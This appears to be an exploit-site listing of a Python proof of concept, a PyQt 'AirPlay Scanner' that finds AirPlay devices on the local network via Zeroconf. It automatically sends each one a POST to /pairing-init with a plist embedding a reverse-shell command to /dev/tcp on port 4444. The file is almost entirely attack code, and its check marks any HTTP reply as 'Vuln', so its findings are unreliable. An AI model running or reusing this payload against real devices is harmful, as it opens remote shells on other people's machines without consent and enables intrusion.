4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / main.py PY
import sys
import socket
import threading
import time
from PyQt5 import QtWidgets, QtCore, QtGui

from zeroconf import Zeroconf, ServiceBrowser, ServiceListener

# === CONFIG ===
ATTACKER_IP = (lambda: (lambda s: (s.connect(("8.8.8.8", 80)), s.getsockname()[0])[1])(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)))()
ATTACKER_PORT = 4444
TARGET_PORT = 7000

DEBUG = True

def debug(msg):
    if DEBUG:
        print(f"[DEBUG] {msg}")

# --- Zeroconf listener ---
class AirPlayListener(ServiceListener):
    def __init__(self, scanner):
        self.scanner = scanner

    def add_service(self, zc, svc_type, name):
        info = zc.get_service_info(svc_type, name)
        if not info or not info.addresses:
            return
        ip = socket.inet_ntoa(info.addresses[0])
        if ip.startswith("127.") or ip in self.scanner.seen:
            return
        self.scanner.seen.add(ip)
        inst = name.split('.')[0]
        props = {}
        for k, v in info.properties.items():
            try:
                key = k.decode() if isinstance(k, bytes) else str(k)
                val = v.decode() if isinstance(v, bytes) else str(v)
                props[key] = val
            except:
                continue
        dev = {"name": inst, "ip": ip, "rce": False}
        dev.update(props)
        debug(f"Discovered {inst}@{ip} with props {list(props.keys())}")
        self.scanner.deviceFound.emit(dev.copy())
        threading.Thread(target=self.scanner.test_device, args=(dev,), daemon=True).start()

    update_service = add_service
    def remove_service(self, *args, **kwargs):
        pass

# --- Scanner thread ---
class ScannerThread(QtCore.QThread):
    deviceFound = QtCore.pyqtSignal(dict)
    deviceTested = QtCore.pyqtSignal(dict)

    def __init__(self):
        super().__init__()
        self.seen = set()
        self._stop = False

    def run(self):
        debug("ScannerThread starting")
        zc = Zeroconf()
        ServiceBrowser(zc, "_airplay._tcp.local.", AirPlayListener(self))
        try:
            while not self._stop:
                time.sleep(0.1)
        finally:
            zc.close()
            debug("ScannerThread stopped")

    def stop(self):
        self._stop = True

    def test_device(self, dev):
        ip = dev["ip"]
        debug(f"RCE test on {ip}")
        xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>launchctl</key>
    <string>/bin/sh -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1</string>
</dict>
</plist>
"""
        req = (
            f"POST /pairing-init HTTP/1.1\r\n"
            f"Host: {ip}\r\n"
            "Content-Type: application/x-apple-binary-plist\r\n"
            f"Content-Length: {len(xml)}\r\n"
            "Connection: close\r\n\r\n"
            + xml
        ).encode()
        try:
            s = socket.socket()
            s.settimeout(5)
            s.connect((ip, TARGET_PORT))
            s.sendall(req)
            resp = s.recv(4096)
            debug(f"RCE resp: {resp[:64]!r}")
            if resp.startswith(b"HTTP"):
                dev["rce"] = True
                debug("-> Marked RCE Vulnerable")
        except Exception as e:
            debug(f"RCE error: {e}")
        finally:
            try: s.close()
            except: pass
        self.deviceTested.emit(dev.copy())

# --- GUI ---
class MainWindow(QtWidgets.QMainWindow):
    def __init__(self):
        super().__init__()
        self.setWindowTitle("AirPlay Scanner PoC")
        self.resize(600, 400)

        self.device_info = {}
        self.tree = QtWidgets.QTreeWidget()
        self.tree.setColumnCount(2)
        self.tree.setHeaderLabels(["Device", "RCE"])
        hdr = self.tree.header()
        hdr.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
        self.tree.itemClicked.connect(self.expand_info)
        self.setCentralWidget(self.tree)

        self.scanner = ScannerThread()
        self.scanner.deviceFound.connect(self.add_item)
        self.scanner.deviceTested.connect(self.update_item)
        self.scanner.start()

    @QtCore.pyqtSlot(dict)
    def add_item(self, d):
        ip = d['ip']
        self.device_info[ip] = d.copy()
        it = QtWidgets.QTreeWidgetItem([f"{d['name']} ({ip})", "Scanning..."])
        it.setData(0, QtCore.Qt.UserRole, ip)
        it.setChildIndicatorPolicy(QtWidgets.QTreeWidgetItem.ShowIndicator)
        self.tree.addTopLevelItem(it)

    @QtCore.pyqtSlot(dict)
    def update_item(self, d):
        ip = d['ip']
        self.device_info[ip] = d.copy()
        for i in range(self.tree.topLevelItemCount()):
            it = self.tree.topLevelItem(i)
            if it.data(0, QtCore.Qt.UserRole) == ip:
                it.setText(1, "Vuln" if d['rce'] else "Safe")
                color = "red" if d['rce'] else "green"
                it.setForeground(1, QtGui.QBrush(QtGui.QColor(color)))
                break

    def expand_info(self, item, col):
        ip = item.data(0, QtCore.Qt.UserRole)
        dev = self.device_info.get(ip)
        if not dev:
            return
        item.takeChildren()
        for key, val in dev.items():
            child = QtWidgets.QTreeWidgetItem([f"{key}: {val}"])
            item.addChild(child)
        item.setExpanded(True)

# --- Entry point ---
def main():
    app = QtWidgets.QApplication(sys.argv)
    window = MainWindow()
    window.show()
    sys.exit(app.exec_())

if __name__ == '__main__':
    debug("Starting AirPlay Scanner PoC")
    main()